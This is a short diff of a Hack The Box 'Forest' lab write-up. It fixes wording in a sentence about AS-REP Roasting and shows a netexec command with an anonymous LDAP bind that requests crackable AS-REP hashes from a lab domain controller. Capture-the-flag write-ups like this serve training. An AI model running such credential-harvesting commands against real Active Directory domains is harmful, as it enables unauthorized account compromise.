meringue7/Writeups/HTB/Forest/Forest.md

 LDAP        10.129.62.73    389    FOREST           [+] htb.local\:
 ```

 Yes!
-So whith that, we can perfrom an AS-REP Roast attack to request a user TGT without his password.
+So with that, I can perform an **AS-REP Roasting** attack to request a user's TGT without their password.

 ```bash
 # nxc ldap 10.129.62.73 -u '' -p '' --asreproast asreproast.txt